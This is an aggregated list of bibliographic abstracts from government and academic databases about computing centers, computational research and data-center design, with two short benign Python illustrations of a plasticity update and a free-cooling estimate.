    2012-02-24

    ...: Center for Scientific Review Special Emphasis Panel; ``Genetics and Epigenetics of Disease.'' Date: March... Scientific Review Special Emphasis Panel; Small Business: Cell, Computational, and Molecular Biology. Date...

  17. Biomedical Computing Technology Information Center: introduction and report of early progress

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Maskewitz, B.F.; Henne, R.L.; McClain, W.J.

    1976-01-01

    In July 1975, the Biomedical Computing Technology Information Center (BCTIC) was established by the Division of Biomedical and Environmental Research of the U. S. Energy Research and Development Administration (ERDA) at the Oak Ridge National Laboratory. BCTIC collects, organizes, evaluates, and disseminates information on computing technology pertinent to biomedicine, providing needed routes of communication between installations and serving as a clearinghouse for the exchange of biomedical computing software, data, and interface designs. This paper presents BCTIC's functions and early progress to the MUMPS Users' Group in order to stimulate further discussion and cooperation between the two organizations. (BCTIC services are available to its sponsors and their contractors and to any individual/group willing to participate in mutual exchange.) 1 figure.

  18. DOE Office of Scientific and Technical Information (OSTI.GOV)

    Tierney, Brian; Dart, Eli; Tierney, Brian

    The Energy Sciences Network (ESnet) is the primary provider of network connectivity for the U.S. Department of Energy Office of Science, the single largest supporter of basic research in the physical sciences in the United States of America. In support of the Office of Science programs, ESnet regularly updates and refreshes its understanding of the networking requirements of the instruments, facilities, scientists, and science programs that it serves. This focus has helped ESnet to be a highly successful enabler of scientific discovery for over 20 years. In March 2008, ESnet and the Fusion Energy Sciences (FES) Program Office of the DOE Office of Science organized a workshop to characterize the networking requirements of the science programs funded by the FES Program Office. Most sites that conduct data-intensive activities (the Tokamaks at GA and MIT, the supercomputer centers at NERSC and ORNL) show a need for on the order of 10 Gbps of network bandwidth for FES-related work within 5 years. PPPL reported a need for 8 times that (80 Gbps) in that time frame. Estimates for the 5-10 year time period are up to 160 Mbps for large simulations. Bandwidth requirements for ITER range from 10 to 80 Gbps. In terms of science process and collaboration structure, it is clear that the proposed Fusion Simulation Project (FSP) has the potential to significantly impact the data movement patterns and therefore the network requirements for U.S. fusion science. As the FSP is defined over the next two years, these changes will become clearer. Also, there is a clear and present unmet need for better network connectivity between U.S. FES sites and two Asian fusion experiments--the EAST Tokamak in China and the KSTAR Tokamak in South Korea.
In addition to achieving its goal of collecting and characterizing the network requirements of the science endeavors funded by the FES Program Office, the workshop emphasized that there is a need for research into better ways of conducting remote collaboration with the control room of a Tokamak running an experiment. This is especially important since the current plans for ITER assume that this problem will be solved.

  19. A nominally second-order cell-centered Lagrangian scheme for simulating elastic-plastic flows on two-dimensional unstructured grids

    NASA Astrophysics Data System (ADS)

    Maire, Pierre-Henri; Abgrall, Rémi; Breil, Jérôme; Loubère, Raphaël; Rebourcet, Bernard

    2013-02-01

    In this paper, we describe a cell-centered Lagrangian scheme devoted to the numerical simulation of solid dynamics on two-dimensional unstructured grids in planar geometry. This numerical method utilizes the classical elastic-perfectly plastic material model initially proposed by Wilkins [M.L. Wilkins, Calculation of elastic-plastic flow, Meth. Comput. Phys. (1964)]. In this model, the Cauchy stress tensor is decomposed into the sum of its deviatoric part and the thermodynamic pressure which is defined by means of an equation of state. Regarding the deviatoric stress, its time evolution is governed by a classical constitutive law for isotropic material. The plasticity model employs the von Mises yield criterion and is implemented by means of the radial return algorithm. The numerical scheme relies on a finite volume cell-centered method wherein numerical fluxes are expressed in terms of sub-cell force. The generic form of the sub-cell force is obtained by requiring the scheme to satisfy a semi-discrete dissipation inequality. Sub-cell force and nodal velocity to move the grid are computed consistently with cell volume variation by means of a node-centered solver, which results from total energy conservation. The nominally second-order extension is achieved by developing a two-dimensional extension in the Lagrangian framework of the Generalized Riemann Problem methodology, introduced by Ben-Artzi and Falcovitz [M. Ben-Artzi, J. Falcovitz, Generalized Riemann Problems in Computational Fluid Dynamics, Cambridge Monogr. Appl. Comput. Math. (2003)]. Finally, the robustness and the accuracy of the numerical scheme are assessed through the computation of several test cases.
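
    The radial return algorithm named in the abstract is a standard plasticity update: take an elastic trial deviatoric stress, and if it falls outside the von Mises yield surface, scale it radially back onto the surface. The following Python sketch illustrates the idea for perfect plasticity; the material constants are assumed, steel-like values, not taken from the paper:

```python
import numpy as np

# Radial return for an elastic-perfectly-plastic von Mises material (sketch).
MU = 80e9          # shear modulus, Pa (assumed)
SIGMA_Y = 250e6    # yield stress, Pa (assumed)

def radial_return(s_old, deps):
    """Update deviatoric stress s_old (3x3) for a strain increment deps (3x3)."""
    deps_dev = deps - np.trace(deps) / 3.0 * np.eye(3)   # deviatoric strain
    s_trial = s_old + 2.0 * MU * deps_dev                # elastic predictor
    norm = np.linalg.norm(s_trial)                       # Frobenius norm
    radius = np.sqrt(2.0 / 3.0) * SIGMA_Y                # yield-surface radius
    if norm <= radius:                                   # elastic step
        return s_trial
    return s_trial * (radius / norm)                     # plastic: scale back

# A pure-shear strain increment large enough to cause yielding
deps = np.zeros((3, 3))
deps[0, 1] = deps[1, 0] = 5e-3
s = radial_return(np.zeros((3, 3)), deps)
print(f"||s|| = {np.linalg.norm(s):.3e} Pa "
      f"(yield radius {np.sqrt(2/3) * SIGMA_Y:.3e} Pa)")
```

    After the return, the deviatoric stress norm sits exactly on the yield radius, while small increments that stay inside the surface remain purely elastic.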

  20. Yahoo! Compute Coop (YCC). A Next-Generation Passive Cooling Design for Data Centers

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Robison, AD; Page, Christina; Lytle, Bob

The purpose of the Yahoo! Compute Coop (YCC) project is to research, design, build and implement a greenfield "efficient data factory" and to specifically demonstrate that the YCC concept is feasible for large facilities housing tens of thousands of heat-producing computing servers. The project scope for the Yahoo! Compute Coop technology includes: - Analyzing and implementing ways in which to drastically decrease energy consumption and waste output. - Analyzing the laws of thermodynamics and implementing naturally occurring environmental effects in order to maximize the "free cooling" of large data center facilities. "Free cooling" is the direct use of outside air to cool the servers, as opposed to traditional "mechanical cooling" supplied by chillers or other DX units. - Redesigning and simplifying building materials and methods. - Shortening and simplifying build-to-operate schedules while at the same time reducing initial build and operating costs. Selected for its favorable climate, the greenfield project site is located in Lockport, NY. Construction on the 9.0 MW critical load data center facility began in May 2009, with the fully operational facility deployed in September 2010. The relatively low initial build cost, compatibility with current server and network models, and the efficient use of power and water are all key features that make it a highly compatible and globally implementable design innovation for the data center industry. Yahoo! Compute Coop technology is designed to achieve 99.98% uptime availability. This integrated building design allows for free cooling 99% of the year via the building's unique shape and orientation, as well as server physical configuration.
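The free-cooling availability claimed in this record is essentially a climate statistic: the fraction of hours in a year during which outside air is cool enough to feed the servers directly. A toy estimate might look like the sketch below; the temperature data and the inlet limit are hypothetical, and the 99% figure above is Yahoo!'s own analysis, not something this sketch reproduces.

```python
def free_cooling_fraction(hourly_temps_c, inlet_limit_c=27.0):
    """Fraction of hours in which outside air alone can cool the servers,
    i.e. the dry-bulb temperature is at or below the server inlet limit."""
    ok = sum(1 for t in hourly_temps_c if t <= inlet_limit_c)
    return ok / len(hourly_temps_c)

# Hypothetical sample: three of four hours are cool enough for direct air cooling.
print(free_cooling_fraction([20.0, 25.0, 30.0, 10.0]))  # 0.75
```

A real siting study would use a full year of hourly weather data and account for humidity limits, not just dry-bulb temperature.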

  1. Development of user-centered interfaces to search the knowledge resources of the Virginia Henderson International Nursing Library.

    PubMed

    Jones, Josette; Harris, Marcelline; Bagley-Thompson, Cheryl; Root, Jane

    2003-01-01

This poster describes the development of user-centered interfaces to extend the functionality of the Virginia Henderson International Nursing Library (VHINL) from a library to a Web-based portal to nursing knowledge resources. The existing knowledge structure and computational models are revised and made complementary. Nurses' search behavior is captured and analyzed, and the resulting search models are mapped to the revised knowledge structure and computational model.

  2. Human Centered Design and Development for NASA's MerBoard

    NASA Technical Reports Server (NTRS)

    Trimble, Jay

    2003-01-01

This viewgraph presentation provides an overview of the design and development process for NASA's MerBoard. These devices are large interactive display screens whose content can also be shown on a user's computer, allowing scientists in many locations to interpret and evaluate mission data in real time. These tools are scheduled to be used during the 2003 Mars Exploration Rover (MER) expeditions. Topics covered include: mission overview, MER Human Centered Computing, FIDO 2001 observations, and MerBoard prototypes.

  3. Payload Operations Control Center (POCC). [spacelab flight operations

    NASA Technical Reports Server (NTRS)

    Shipman, D. L.; Noneman, S. R.; Terry, E. S.

    1981-01-01

    The Spacelab payload operations control center (POCC) timeline analysis program which is used to provide POCC activity and resource information as a function of mission time is described. This program is fully automated and interactive, and is equipped with tutorial displays. The tutorial displays are sufficiently detailed for use by a program analyst having no computer experience. The POCC timeline analysis program is designed to operate on the VAX/VMS version V2.1 computer system.

  4. Development of computational methods for unsteady aerodynamics at the NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Yates, E. Carson, Jr.; Whitlow, Woodrow, Jr.

    1987-01-01

    The current scope, recent progress, and plans for research and development of computational methods for unsteady aerodynamics at the NASA Langley Research Center are reviewed. Both integral equations and finite difference methods for inviscid and viscous flows are discussed. Although the great bulk of the effort has focused on finite difference solution of the transonic small perturbation equation, the integral equation program is given primary emphasis here because it is less well known.

  5. Development of computational methods for unsteady aerodynamics at the NASA Langley Research Center

    NASA Technical Reports Server (NTRS)

    Yates, E. Carson, Jr.; Whitlow, Woodrow, Jr.

    1987-01-01

    The current scope, recent progress, and plans for research and development of computational methods for unsteady aerodynamics at the NASA Langley Research Center are reviewed. Both integral-equations and finite-difference method for inviscid and viscous flows are discussed. Although the great bulk of the effort has focused on finite-difference solution of the transonic small-perturbation equation, the integral-equation program is given primary emphasis here because it is less well known.

  6. Human Centered Computing for Mars Exploration

    NASA Technical Reports Server (NTRS)

    Trimble, Jay

    2005-01-01

    The science objectives are to determine the aqueous, climatic, and geologic history of a site on Mars where conditions may have been favorable to the preservation of evidence of prebiotic or biotic processes. Human Centered Computing is a development process that starts with users and their needs, rather than with technology. The goal is a system design that serves the user, where the technology fits the task and the complexity is that of the task not of the tool.

  7. Effect of solutes on the lattice parameters and elastic stiffness coefficients of body-centered tetragonal Fe

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fellinger, Michael R.; Hector, Jr., Louis G.; Trinkle, Dallas R.

In this study, we compute changes in the lattice parameters and elastic stiffness coefficients C ij of body-centered tetragonal (bct) Fe due to Al, B, C, Cu, Mn, Si, and N solutes. Solute strain misfit tensors determine changes in the lattice parameters as well as strain contributions to the changes in the C ij. We also compute chemical contributions to the changes in the C ij, and show that the sum of the strain and chemical contributions agrees with more computationally expensive direct calculations that simultaneously incorporate both contributions. Octahedral interstitial solutes, with C being the most important addition in steels, must be present to stabilize the bct phase over the body-centered cubic phase. We therefore compute the effects of interactions between interstitial C solutes and substitutional solutes on the bct lattice parameters and C ij for all possible solute configurations in the dilute limit, and thermally average the results to obtain effective changes in properties due to each solute. Finally, the computed data can be used to estimate solute-induced changes in mechanical properties such as strength and ductility, and can be directly incorporated into mesoscale simulations of multiphase steels to model solute effects on the bct martensite phase.
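The configurational thermal average mentioned in this abstract is, in generic form, a Boltzmann-weighted mean over solute arrangements. A minimal sketch is given below; the function and variable names, and the eV/K unit convention, are illustrative assumptions, not taken from the paper.

```python
import math

def thermal_average(values, energies_ev, temp_k, degeneracies=None, k_b=8.617333e-5):
    """Boltzmann-weighted average of a property over solute configurations.

    values       -- property change for each configuration (e.g. a delta C_ij)
    energies_ev  -- configuration energies in eV (relative to any common reference)
    temp_k       -- temperature in kelvin
    degeneracies -- multiplicity of each configuration (defaults to 1 each)
    """
    if degeneracies is None:
        degeneracies = [1.0] * len(values)
    weights = [g * math.exp(-e / (k_b * temp_k))
               for g, e in zip(degeneracies, energies_ev)]
    z = sum(weights)  # configurational partition function
    return sum(w * v for w, v in zip(weights, values)) / z
```

Configurations with equal energies reduce this to a plain (degeneracy-weighted) mean, while a configuration 1 eV above the ground state is effectively frozen out at room temperature.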

  8. Heart CT scan

    MedlinePlus

    ... Computed tomography scan - heart; Calcium scoring; Multi-detector CT scan - heart; Electron beam computed tomography - heart; Agatston ... table that slides into the center of the CT scanner. You will lie on your back with ...

  9. 78 FR 68462 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-11-14

    ... personal privacy. Name of Committee: Center for Scientific Review Special Emphasis Panel; Brain Injury and... Methodologies Integrated Review Group; Biomedical Computing and Health Informatics Study Section. Date: December...

  10. IUWare and Computing Tools: Indiana University's Approach to Low-Cost Software.

    ERIC Educational Resources Information Center

    Sheehan, Mark C.; Williams, James G.

    1987-01-01

    Describes strategies for providing low-cost microcomputer-based software for classroom use on college campuses. Highlights include descriptions of the software (IUWare and Computing Tools); computing center support; license policies; documentation; promotion; distribution; staff, faculty, and user training; problems; and future plans. (LRW)

  11. Adaptive Mesh Experiments for Hyperbolic Partial Differential Equations

    DTIC Science & Technology

    1990-02-01

Joseph E. Flaherty, February 1990. U.S. Army Armament Research, Development and Engineering Center, Close Combat Armaments Center, Benet Laboratories, Watervliet, NY 12189-4050; Department of Computer Science, Rensselaer Polytechnic Institute, Troy, NY 12180-3590.

  12. Commercial Pilot Knowledge Test Guide

    DOT National Transportation Integrated Search

    1995-01-01

    The FAA has available hundreds of computer testing centers nationwide. These testing centers offer the full range of airman knowledge tests including military competence, instrument foreign pilot, and pilot examiner predesignated tests. Refer to appe...

  13. ARC-2009-ACD09-0208-029

    NASA Image and Video Library

    2009-09-15

Obama Administration launches Cloud Computing Initiative at Ames Research Center. Vivek Kundra, White House Chief Federal Information Officer (right), and Lori Garver, NASA Deputy Administrator (left), get a tour and demo of NASA's Supercomputing Center Hyperwall.

  14. 76 FR 24036 - Center for Scientific Review; Notice of Closed Meetings

    Federal Register 2010, 2011, 2012, 2013, 2014

    2011-04-29

    ... personal privacy. Name of Committee: Center for Scientific Review Special Emphasis Panel, Brain Disorders... Integrated Review Group, Biomedical Computing and Health Informatics Study Section. Date: June 7-8, 2011...

  15. Instrument Rating Knowledge Test Guide

    DOT National Transportation Integrated Search

    1995-01-01

    The FAA has available hundreds of computer testing centers nationwide. These testing centers offer the full range of airman knowledge tests including military competence, instrument foreign pilot, and pilot examiner predesignated tests. Refer to appe...

  16. Network Computer Technology. Phase I: Viability and Promise within NASA's Desktop Computing Environment

    NASA Technical Reports Server (NTRS)

    Paluzzi, Peter; Miller, Rosalind; Kurihara, West; Eskey, Megan

    1998-01-01

    Over the past several months, major industry vendors have made a business case for the network computer as a win-win solution toward lowering total cost of ownership. This report provides results from Phase I of the Ames Research Center network computer evaluation project. It identifies factors to be considered for determining cost of ownership; further, it examines where, when, and how network computer technology might fit in NASA's desktop computing architecture.

  17. Displaying Computer Simulations Of Physical Phenomena

    NASA Technical Reports Server (NTRS)

    Watson, Val

    1991-01-01

    Paper discusses computer simulation as means of experiencing and learning to understand physical phenomena. Covers both present simulation capabilities and major advances expected in near future. Visual, aural, tactile, and kinesthetic effects used to teach such physical sciences as dynamics of fluids. Recommends classrooms in universities, government, and industry be linked to advanced computing centers so computer simulations integrated into education process.

  18. Association of Small Computer Users in Education (ASCUE) Summer Conference Proceedings (30th, North Myrtle Beach, South Carolina, June 7-12, 1997).

    ERIC Educational Resources Information Center

    Smith, Peter, Ed.

    Papers from a conference on small college computing issues are: "An On-line Microcomputer Course for Pre-service Teachers" (Mary K. Abkemeier); "The Mathematics and Computer Science Learning Center (MLC)" (Solomon T. Abraham); "Multimedia for the Non-Computer Science Faculty Member" (Stephen T. Anderson, Sr.); "Achieving Continuous Improvement:…

  19. Computer Self-Efficacy, Computer Anxiety, and Attitudes toward the Internet: A Study among Undergraduates in Unimas

    ERIC Educational Resources Information Center

    Sam, Hong Kian; Othman, Abang Ekhsan Abang; Nordin, Zaimuarifuddin Shukri

    2005-01-01

    Eighty-one female and sixty-seven male undergraduates at a Malaysian university, from seven faculties and a Center for Language Studies completed a Computer Self-Efficacy Scale, Computer Anxiety Scale, and an Attitudes toward the Internet Scale and give information about their use of the Internet. This survey research investigated undergraduates'…

  20. 75 FR 75393 - Schools and Libraries Universal Service Support Mechanism and A National Broadband Plan for Our...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-12-03

    ... anchors, both as centers for digital literacy and as hubs for access to public computers. While their... expansion of computer labs, and facilitated deployment of new educational applications that would not have... computer fees to help defray the cost of computers or training fees to help cover the cost of training...

  1. Computational Science | NREL

    Science.gov Websites

The NREL Computational Science team addresses challenges in fields ranging from condensed matter physics and nonlinear dynamics to computational fluid dynamics. NREL is also home to the most energy-efficient data center in the world, featuring Peregrine, the ...

  2. Delivering The Benefits of Chemical-Biological Integration in Computational Toxicology at the EPA (ACS Fall meeting)

    EPA Science Inventory

    Abstract: Researchers at the EPA’s National Center for Computational Toxicology integrate advances in biology, chemistry, and computer science to examine the toxicity of chemicals and help prioritize chemicals for further research based on potential human health risks. The intent...

  3. A Serious Game of Success

    ERIC Educational Resources Information Center

    Nikirk, Martin

    2006-01-01

    This article discusses a computer game design and animation pilot at Washington County Technical High School as part of the advanced computer applications completer program. The focus of the instructional program is to teach students the 16 components of computer game design through a team-centered, problem-solving instructional format. Among…

  4. Some Measurement and Instruction Related Considerations Regarding Computer Assisted Testing.

    ERIC Educational Resources Information Center

    Oosterhof, Albert C.; Salisbury, David F.

    The Assessment Resource Center (ARC) at Florida State University provides computer assisted testing (CAT) for approximately 4,000 students each term. Computer capabilities permit a small proctoring staff to administer tests simultaneously to large numbers of students. Programs provide immediate feedback for students and generate a variety of…

  5. 78 FR 48169 - Privacy Act of 1974; CMS Computer Match No. 2013-02; HHS Computer Match No. 1306; DoD-DMDC Match...

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-08-07

    ...), Defense Manpower Data Center (DMDC) and the Office of the Assistant Secretary of Defense (Health Affairs.../TRICARE. DMDC will receive the results of the computer match and provide the information to TMA for use in...

  6. Introduction to the theory of machines and languages

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Weidhaas, P. P.

    1976-04-01

This text is intended to be an elementary "guided tour" through some basic concepts of modern computer science. Various models of computing machines and formal languages are studied in detail. Discussions center around questions such as, "What is the scope of problems that can or cannot be solved by computers?"

  7. Management Needs for Computer Support.

    ERIC Educational Resources Information Center

    Irby, Alice J.

    University management has many and varied needs for effective computer services in support of their processing and information functions. The challenge for the computer center managers is to better understand these needs and assist in the development of effective and timely solutions. Management needs can range from accounting and payroll to…

  8. Computer Training for Early Childhood Educators.

    ERIC Educational Resources Information Center

    Specht, Jacqueline; Wood, Eileen; Willoughby, Teena

    Recent research in early childhood education (ECE) centers suggests that some teacher characteristics are not at a level that would support computer learning opportunities for children. This study identified areas of support required by teachers to provide a smooth introduction of the computer into the early childhood education classroom.…

  9. Administration of Computer Resources.

    ERIC Educational Resources Information Center

    Franklin, Gene F.

    Computing at Stanford University has, until recently, been performed at one of five facilities. The Stanford hospital operates an IBM 370/135 mainly for administrative use. The university business office has an IBM 370/145 for its administrative needs and support of the medical clinic. Under the supervision of the Stanford Computation Center are…

  10. Computer Conferencing: Distance Learning That Works.

    ERIC Educational Resources Information Center

    Norton, Robert E.; Stammen, Ronald M.

    This paper reports on a computer conferencing pilot project initiated by the Consortium for the Development of Professional Materials for Vocational Education and developed at the Center on Education and Training for Employment at Ohio State University. The report provides an introduction to computer conferencing and describes the stages of the…

  11. 75 FR 54162 - Privacy Act of 1974

    Federal Register 2010, 2011, 2012, 2013, 2014

    2010-09-03

    ... Program A. General The Computer Matching and Privacy Protection Act of 1988 (Pub. L. 100-503), amended the... DEPARTMENT OF HEALTH AND HUMAN SERVICES Centers for Medicare and Medicaid Services [CMS Computer Match No. 2010-01; HHS Computer Match No. 1006] Privacy Act of 1974 AGENCY: Department of Health and...

  12. Presentation Software and the Single Computer.

    ERIC Educational Resources Information Center

    Brown, Cindy A.

    1998-01-01

    Shows how the "Kid Pix" software and a single multimedia computer can aid classroom instruction for kindergarten through second grade. Topics include using the computer as a learning center for small groups of students; making a "Kid Pix" slide show; using it as an electronic chalkboard; and creating curriculum-related…

  13. 78 FR 63196 - Privacy Act System of Records

    Federal Register 2010, 2011, 2012, 2013, 2014

    2013-10-23

    ... Technology Center (ITC) staff and contractors, who maintain the FCC's computer network. Other FCC employees... and Offices (B/ Os); 2. Electronic data, records, and files that are stored in the FCC's computer.... Access to the FACA electronic records, files, and data, which are housed in the FCC's computer network...

  14. Should Professors Ban Laptops?

    ERIC Educational Resources Information Center

    Carter, Susan Payne; Greenberg, Kyle; Walker, Michael S.

    2017-01-01

    Laptop computers have become commonplace in K-12 and college classrooms. With that, educators now face a critical decision. Should they embrace computers and put technology at the center of their instruction? Should they allow students to decide for themselves whether to use computers during class? Or should they ban screens altogether and embrace…

  15. Computational Nanotechnology at NASA Ames Research Center, 1996

    NASA Technical Reports Server (NTRS)

    Globus, Al; Bailey, David; Langhoff, Steve; Pohorille, Andrew; Levit, Creon; Chancellor, Marisa K. (Technical Monitor)

    1996-01-01

Some forms of nanotechnology appear to have enormous potential to improve aerospace and computer systems; computational nanotechnology, the design and simulation of programmable molecular machines, is crucial to progress. NASA Ames Research Center has begun a computational nanotechnology program including in-house work, external research grants, and grants of supercomputer time. Four goals have been established: (1) Simulate a hypothetical programmable molecular machine replicating itself and building other products. (2) Develop molecular manufacturing CAD (computer aided design) software and use it to design molecular manufacturing systems and products of aerospace interest, including computer components. (3) Characterize nanotechnologically accessible materials of aerospace interest. Such materials may have excellent strength and thermal properties. (4) Collaborate with experimentalists. Current in-house activities include: (1) Development of NanoDesign, software to design and simulate a nanotechnology based on functionalized fullerenes. Early work focuses on gears. (2) A design for high density atomically precise memory. (3) Design of nanotechnology systems based on biology. (4) Characterization of diamondoid mechanosynthetic pathways. (5) Studies of the Laplacian of the electronic charge density to understand molecular structure and reactivity. (6) Studies of entropic effects during self-assembly. (7) Characterization of properties of matter for clusters up to sizes exhibiting bulk properties. In addition, the NAS (NASA Advanced Supercomputing) supercomputer division sponsored a workshop on computational molecular nanotechnology on March 4-5, 1996, held at NASA Ames Research Center. Finally, collaborations with Bill Goddard at Caltech, Ralph Merkle at Xerox PARC, Don Brenner at NCSU (North Carolina State University), Tom McKendree at Hughes, and Todd Wipke at UCSC are underway.

  16. Applications of Computer Technology in Complex Craniofacial Reconstruction.

    PubMed

    Day, Kristopher M; Gabrick, Kyle S; Sargent, Larry A

    2018-03-01

    To demonstrate our use of advanced 3-dimensional (3D) computer technology in the analysis, virtual surgical planning (VSP), 3D modeling (3DM), and treatment of complex congenital and acquired craniofacial deformities. We present a series of craniofacial defects treated at a tertiary craniofacial referral center utilizing state-of-the-art 3D computer technology. All patients treated at our center using computer-assisted VSP, prefabricated custom-designed 3DMs, and/or 3D printed custom implants (3DPCI) in the reconstruction of craniofacial defects were included in this analysis. We describe the use of 3D computer technology to precisely analyze, plan, and reconstruct 31 craniofacial deformities/syndromes caused by: Pierre-Robin (7), Treacher Collins (5), Apert's (2), Pfeiffer (2), Crouzon (1) Syndromes, craniosynostosis (6), hemifacial microsomia (2), micrognathia (2), multiple facial clefts (1), and trauma (3). In select cases where the available bone was insufficient for skeletal reconstruction, 3DPCIs were fabricated using 3D printing. We used VSP in 30, 3DMs in all 31, distraction osteogenesis in 16, and 3DPCIs in 13 cases. Utilizing these technologies, the above complex craniofacial defects were corrected without significant complications and with excellent aesthetic results. Modern 3D technology allows the surgeon to better analyze complex craniofacial deformities, precisely plan surgical correction with computer simulation of results, customize osteotomies, plan distractions, and print 3DPCI, as needed. The use of advanced 3D computer technology can be applied safely and potentially improve aesthetic and functional outcomes after complex craniofacial reconstruction. These techniques warrant further study and may be reproducible in various centers of care.

  17. For operation of the Computer Software Management and Information Center (COSMIC)

    NASA Technical Reports Server (NTRS)

    Carmon, J. L.

    1983-01-01

    Computer programs for relational information management data base systems, spherical roller bearing analysis, a generalized pseudoinverse of a rectangular matrix, and software design and documentation language are summarized.

  18. NREL Evaluates Aquarius Liquid-Cooled High-Performance Computing Technology

    Science.gov Websites

... HPC and influence the modern data center designer toward adoption of liquid cooling. Aquila and Sandia chose NREL's HPC Data Center for the initial installation and evaluation because the data center is configured for liquid cooling, along with the required instrumentation to ...

  19. NASA propagation information center

    NASA Technical Reports Server (NTRS)

    Smith, Ernest K.; Flock, Warren L.

    1990-01-01

    The NASA Propagation Information Center became formally operational in July 1988. It is located in the Department of Electrical and Computer Engineering of the University of Colorado at Boulder. The center is several things: a communications medium for the propagation with the outside world, a mechanism for internal communication within the program, and an aid to management.

  20. "Hack" Is Not A Dirty Word--The Tenth Anniversary of Patron Access Microcomputer Centers in Libraries.

    ERIC Educational Resources Information Center

    Dewey, Patrick R.

    1986-01-01

    The history of patron access microcomputers in libraries is described as carrying on a tradition that information and computer power should be shared. Questions that all types of libraries need to ask in planning microcomputer centers are considered and several model centers are described. (EM)
